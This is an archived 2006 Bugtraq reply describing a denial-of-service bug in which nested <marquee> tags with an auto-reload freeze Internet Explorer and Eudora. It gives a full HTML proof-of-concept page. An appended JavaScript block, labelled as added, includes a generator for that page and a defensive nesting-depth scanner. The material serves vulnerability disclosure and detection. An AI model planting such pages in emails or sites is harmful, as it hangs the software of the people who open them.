Date: Wed, 07 Jun 2006 12:43:34 +0200
From: Jaroslaw Sajko <sloik@...areal.net>
To: Sanjay Rawat <sanjayr@...oto.com>
Cc: andy@....uk.com, 'Josh Zlatin-Amishav' <josh@...s.co.il>,
	co296@....com, bugtraq@...urityfocus.com
Subject: RE: Fire fox dos exploit


On Mon, 05-06-2006 at 09:19 +0530, Sanjay Rawat wrote:
> I have seen that the exploit also freezes Eudora 6.2.1.2. I was trying to 
> open the original mail in the Eudora mail client and whenever I clicked on 
> the mail, Eudora stopped responding. I had to restart the application.
> 
> regards
> -Sanjay Rawat

Yes, it's because Eudora uses the Internet_Explorer_Server component to
display the content of the email, and the previously mentioned DoS case
with the nested <marquee> tags concerns Internet Explorer as well. 

If you want to trigger this DoS under IExplorer you have to include the
<style></style> tags on two separate lines and you have to refresh
the page; only the second page fetch freezes the browser. 

Tested on 6.0.2900.2180 XPSP2

Example is here:

--[cut]--

<html>
<head>
<style>
</style>
</head>
<body onload="javascript:window.location.reload(false)">
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee>
</body>
</html>

--[/cut]-- 

regards,
Jarek Sajko
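The nested-<marquee> pattern discussed in this thread, as an added example that is not part of the original post and not the poster's code: a small builder that reproduces the page structure described above (the <style></style> pair on two separate lines, the reload on load, and a configurable nesting depth), plus a scanner a mail gateway or proxy could run over an HTML body to measure how deeply <marquee> elements are nested before a legacy Trident-based client renders it. The function names, the sample inputs and the flagging threshold of 32 are all assumptions; the post gives no minimum depth, only a sample several dozen levels deep.

```javascript
// Added example, not code from the original post.

// Build the PoC structure described in the post: <style></style> on two
// separate lines, a reload in onload, and `depth` nested <marquee> tags.
function buildNestedMarqueePage(depth) {
  const open = '<marquee>'.repeat(depth);
  const close = '</marquee>'.repeat(depth);
  return [
    '<html>',
    '<head>',
    '<style>',
    '</style>',
    '</head>',
    '<body onload="javascript:window.location.reload(false)">',
    open + close,
    '</body>',
    '</html>',
  ].join('\n');
}

// Return the maximum nesting depth of <marquee> elements in an HTML string.
// A minimal tag tokenizer is enough: HTML comments and the bodies of
// <script>/<style> are skipped so a "<marquee>" inside them does not count,
// and a stray close tag never drives the depth below zero.
function maxMarqueeDepth(html) {
  const tagRe = /<!--[\s\S]*?-->|<\s*(\/?)\s*([a-zA-Z][a-zA-Z0-9]*)[^>]*>/g;
  let depth = 0;
  let maxDepth = 0;
  let skipUntil = null; // name of the raw-text element we are inside, if any
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    if (m[0].startsWith('<!--')) continue; // comment: ignore entirely
    const closing = m[1] === '/';
    const name = m[2].toLowerCase();
    if (skipUntil !== null) {
      if (closing && name === skipUntil) skipUntil = null;
      continue;
    }
    if (!closing && (name === 'script' || name === 'style')) {
      skipUntil = name;
      continue;
    }
    if (name !== 'marquee') continue;
    if (closing) {
      if (depth > 0) depth--;
    } else {
      depth++;
      if (depth > maxDepth) maxDepth = depth;
    }
  }
  return maxDepth;
}

// Gateway-style policy check. The default threshold is an assumed value;
// tune it to what the protected client population actually tolerates.
function isSuspiciousMarqueeNesting(html, threshold = 32) {
  return maxMarqueeDepth(html) > threshold;
}

// Constructed sample bodies (not real mail traffic).
const SAMPLES = {
  benign: '<html><body><marquee>Sale!</marquee><p>hello</p></body></html>',
  commentOnly: '<html><body><!-- ' + '<marquee>'.repeat(100) + ' -->ok</body></html>',
  poc: buildNestedMarqueePage(64),
};

if (typeof require !== 'undefined' && require.main === module) {
  for (const [label, body] of Object.entries(SAMPLES)) {
    console.log(label + ': depth=' + maxMarqueeDepth(body) +
      ' flagged=' + isSuspiciousMarqueeNesting(body));
  }
}
```

The scanner deliberately does not use a DOM parser: the point is to measure the raw nesting the client's parser will be asked to build, not the tree a tolerant parser would produce after error recovery, and a regex tokenizer also runs fine in a gateway without a browser engine.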


